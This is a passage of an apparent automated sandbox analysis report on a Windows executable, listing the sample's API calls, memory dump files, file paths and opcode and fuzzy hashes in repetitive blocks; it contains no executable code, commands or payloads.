            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
            • String ID:
            • API String ID: 334405425-0
            • Opcode ID: aa3a9c24d5dfe2ba4ee83eee6d659bb068150cb13ee35f665b9fc85874293134
            • Instruction ID: 135227bab5bbd0cb957ad13063370cb04025123e1843093ab7a3381522db9c00
            • Opcode Fuzzy Hash: aa3a9c24d5dfe2ba4ee83eee6d659bb068150cb13ee35f665b9fc85874293134
            • Instruction Fuzzy Hash: 7D21A731900219EBCF20AFA5CE48A9E7E71BF00354F20427BF511B51E1DBBD8A81DA5D
            APIs
              • Part of subcall function 004064C1: FindFirstFileW.KERNELBASE(75923420,00426778,00425F30,00405C83,00425F30,00425F30,00000000,00425F30,00425F30,75923420,?,75922EE0,0040598F,?,75923420,75922EE0), ref: 004064CC
              • Part of subcall function 004064C1: FindClose.KERNEL32(00000000), ref: 004064D8
            • lstrlenW.KERNEL32 ref: 0040222A
            • lstrlenW.KERNEL32(00000000), ref: 00402235
            • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 0040225E
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: FileFindlstrlen$CloseFirstOperation
            • String ID:
            • API String ID: 1486964399-0
            • Opcode ID: d66942df8d036b379b64e757785a2f27fbbd70af3bcc75f6c05945ff82ef53e5
            • Instruction ID: 9c43d8eab5e28b8efadc9e1ada5fd511aa80cab417b32b1cb638ddde26c09318
            • Opcode Fuzzy Hash: d66942df8d036b379b64e757785a2f27fbbd70af3bcc75f6c05945ff82ef53e5
            • Instruction Fuzzy Hash: 4711707190021896CB10EFF98D4999EB7F8AF04314F10807FA905FB2DAE6B8D9018B69
            APIs
              • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
            • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004024CD
            • RegEnumValueW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,00000003), ref: 004024E0
            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\Pictures\forflytningers\strudsg.Dis,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: Enum$CloseOpenValue
            • String ID:
            • API String ID: 167947723-0
            • Opcode ID: 5a72654c67f0fa8b4604dcdbd66fc4e1eeb13e48f209a1bf800aa821ae4d0273
            • Instruction ID: c7ec42ec2a5b8cbcf97019b844e04a4f9c539befeef3331d530b96059407f5ff
            • Opcode Fuzzy Hash: 5a72654c67f0fa8b4604dcdbd66fc4e1eeb13e48f209a1bf800aa821ae4d0273
            • Instruction Fuzzy Hash: FCF03171A14204EBEB209F65DE8CABF767DEF80354B10843FF505B61D0DAB84D419B69
            APIs
            • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403708,?), ref: 004038E7
            • CloseHandle.KERNEL32(FFFFFFFF,C:\Users\user\AppData\Local\Temp\,00403708,?), ref: 004038FB
            Strings
            • C:\Users\user\AppData\Local\Temp\, xrefs: 004038DA
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: CloseHandle
            • String ID: C:\Users\user\AppData\Local\Temp\
            • API String ID: 2962429428-823278215
            • Opcode ID: f084a8137c272c7609008576fb265960e9ac12256820a4da339362f4de570230
            • Instruction ID: 23b98c188a40640ee87c89e263e7d2a3484f90a0975adae1b2ea6fd77d705eba
            • Opcode Fuzzy Hash: f084a8137c272c7609008576fb265960e9ac12256820a4da339362f4de570230
            • Instruction Fuzzy Hash: 78E086B14407149AC124AF7CAD495853A185F453357248726F178F20F0C778996B5E9D
            APIs
            • SetFilePointer.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,?,?,00403093,000000FF,00000000,00000000,0040A230,?), ref: 0040310C
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: FilePointer
            • String ID:
            • API String ID: 973152223-0
            • Opcode ID: 1aa85c7260de761b297061d79344dc340e95e4778a17b24641d9514d9a29d692
            • Instruction ID: 040f2acbe5348ef8c996952313d322865bd2faa87b76d8d9ba7109e69b0e4b3d
            • Opcode Fuzzy Hash: 1aa85c7260de761b297061d79344dc340e95e4778a17b24641d9514d9a29d692
            • Instruction Fuzzy Hash: 22316B30200219EBDB108F55ED84ADA3F68EB08359F20813AF905EA1D0DB79DF50DBA9
            APIs
              • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
            • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?), ref: 0040245B
            • RegCloseKey.KERNELBASE(?,?,?,C:\Users\user\Pictures\forflytningers\strudsg.Dis,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024F6
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: CloseOpenQueryValue
            • String ID:
            • API String ID: 3677997916-0
            • Opcode ID: de279f57127d96360098b133bd08e52081b1973a8dd70b0d7cd0d7159ea79358
            • Instruction ID: a4ed2935f8c713a64b441f8b02302a8faa8aa65f3841d01997d269d515fb9b23
            • Opcode Fuzzy Hash: de279f57127d96360098b133bd08e52081b1973a8dd70b0d7cd0d7159ea79358
            • Instruction Fuzzy Hash: 9D119131911205EBDB10CFA0CA489AEB7B4EF44354B20843FE446B72D0D6B85A41DB19
            APIs
            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
            • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: MessageSend
            • String ID:
            • API String ID: 3850602802-0
            • Opcode ID: 3ee467f7d586eb782eae2bae36c3decf9d7e0780ea8b642ce91f4ebf2c7a7eb5
            • Instruction ID: d65e0694727b7210e6f7bc09f77efd2c0147e56cffd904cd4a2c980f2ed28b93
            • Opcode Fuzzy Hash: 3ee467f7d586eb782eae2bae36c3decf9d7e0780ea8b642ce91f4ebf2c7a7eb5
            • Instruction Fuzzy Hash: 3D01D131724210EBEB195B789D04B2A3698E714314F1089BAF855F62F1DA788C128B5D
            APIs
              • Part of subcall function 00402CC9: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402CF1
            • RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040233E
            • RegCloseKey.ADVAPI32(00000000), ref: 00402347
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: CloseDeleteOpenValue
            • String ID:
            • API String ID: 849931509-0
            • Opcode ID: e6d2ca00a4cf4cefd9a25a51a4bce36b53fc9301e1c3a400c995454b5a58ed0c
            • Instruction ID: b5033fe3495a5d5fbf66e52db86fe43622c16bf705f2fe0f4142c4154f9543e6
            • Opcode Fuzzy Hash: e6d2ca00a4cf4cefd9a25a51a4bce36b53fc9301e1c3a400c995454b5a58ed0c
            • Instruction Fuzzy Hash: 45F04F32A04110ABEB11BFB59B4EABE726A9B40314F15807BF501B71D5D9FC99025629
            APIs
            • OleInitialize.OLE32(00000000), ref: 004053C0
              • Part of subcall function 0040428E: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004042A0
            • CoUninitialize.COMBASE(00000404,00000000), ref: 0040540C
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: InitializeMessageSendUninitialize
            • String ID:
            • API String ID: 2896919175-0
            • Opcode ID: 3868b5a52622b10a1177551b7cc78a5ffd836502efb30cae45cbc154cdcfe80d
            • Instruction ID: fd15c1a48ffcd0bde852b119af7687a848e5b357f1d71b2c4b4b2b4c4c2fcb19
            • Opcode Fuzzy Hash: 3868b5a52622b10a1177551b7cc78a5ffd836502efb30cae45cbc154cdcfe80d
            • Instruction Fuzzy Hash: 55F0F076645601CBD3101B54AD05B5B7268EF80781F56407EEE44A23F1CABA48428B2E
            APIs
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: ShowWindow
            • String ID:
            • API String ID: 1268545403-0
            • Opcode ID: ce20f7e4c1aa44f85ea9145b67e8d42c5a0476d2cc0a7cf7277b8896e12d5138
            • Instruction ID: 3d140fe00ea388f21a06c6326494b10f153b64dd8f5dad9855b01bbfc98b082c
            • Opcode Fuzzy Hash: ce20f7e4c1aa44f85ea9145b67e8d42c5a0476d2cc0a7cf7277b8896e12d5138
            • Instruction Fuzzy Hash: 65E04876B00104DBCB24CBA4ED808AD77A6AB44310750497BD501B3660C675DC51CF28
            APIs
            • GetModuleHandleA.KERNEL32(?,00000020,?,0040341F,00000009), ref: 0040656A
            • GetProcAddress.KERNEL32(00000000,?), ref: 00406585
              • Part of subcall function 004064E8: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 004064FF
              • Part of subcall function 004064E8: wsprintfW.USER32 ref: 0040653A
              • Part of subcall function 004064E8: LoadLibraryExW.KERNEL32(?,00000000,00000008), ref: 0040654E
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
            • String ID:
            • API String ID: 2547128583-0
            • Opcode ID: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
            • Instruction ID: 8c1a5bb66f910ccc430fc34c4425cef617f316e2833151c7c1ff8c8a0ee84b40
            • Opcode Fuzzy Hash: 31197a09b32f9822319ed056a1c078f96e3f7aaf520cdba8edd4f010bc886546
            • Instruction Fuzzy Hash: C3E086326042206BD6105B706E0893762BC9ED8740302483EF946F2084D778DC329A6D
            APIs
            • GetFileAttributesW.KERNELBASE(00000003,00402E84,00438800,80000000,00000003), ref: 00405D57
            • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405D79
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: File$AttributesCreate
            • String ID:
            • API String ID: 415043291-0
            • Opcode ID: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
            • Instruction ID: e98dd403a5e5432679a9d4e257ef455d3d6759c2e5ed6cf280caa05d5291d686
            • Opcode Fuzzy Hash: 7f22f31ca84e25cf3c35cca7fc28e1469c604482c982d9b12555b4894eb7b1e0
            • Instruction Fuzzy Hash: B3D09E71654601EFEF098F20DF16F2E7AA2EB84B00F11562CB682940E0DA7158199B19
            APIs
            • GetFileAttributesW.KERNELBASE(?,?,00405933,?,?,00000000,00405B09,?,?,?,?), ref: 00405D33
            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405D47
            Memory Dump Source
            • Source File: 00000000.00000002.2047859798.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.2047839235.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047888041.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.000000000042F000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000433000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2047910746.0000000000450000.00000004.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.2048131742.0000000000453000.00000002.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_rArz0wnYVU.jbxd
            Similarity
            • API ID: AttributesFile
            • String ID:
            • API String ID: 3188754299-0
            • Opcode ID: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
            • Instruction ID: 62c1218995ad43f24aa052634507c0d83541fa9dca801c4eab67991220ff17ac
            • Opcode Fuzzy Hash: 2eea293136030474feb3e1a7c5b1a6ed000805180dcccd9d627e45cfe66d6639
            • Instruction Fuzzy Hash: 40D01272504520AFC2513738EF0C89BBF95EB543B17028B35FAF9A22F0DB304C568A98
            APIs
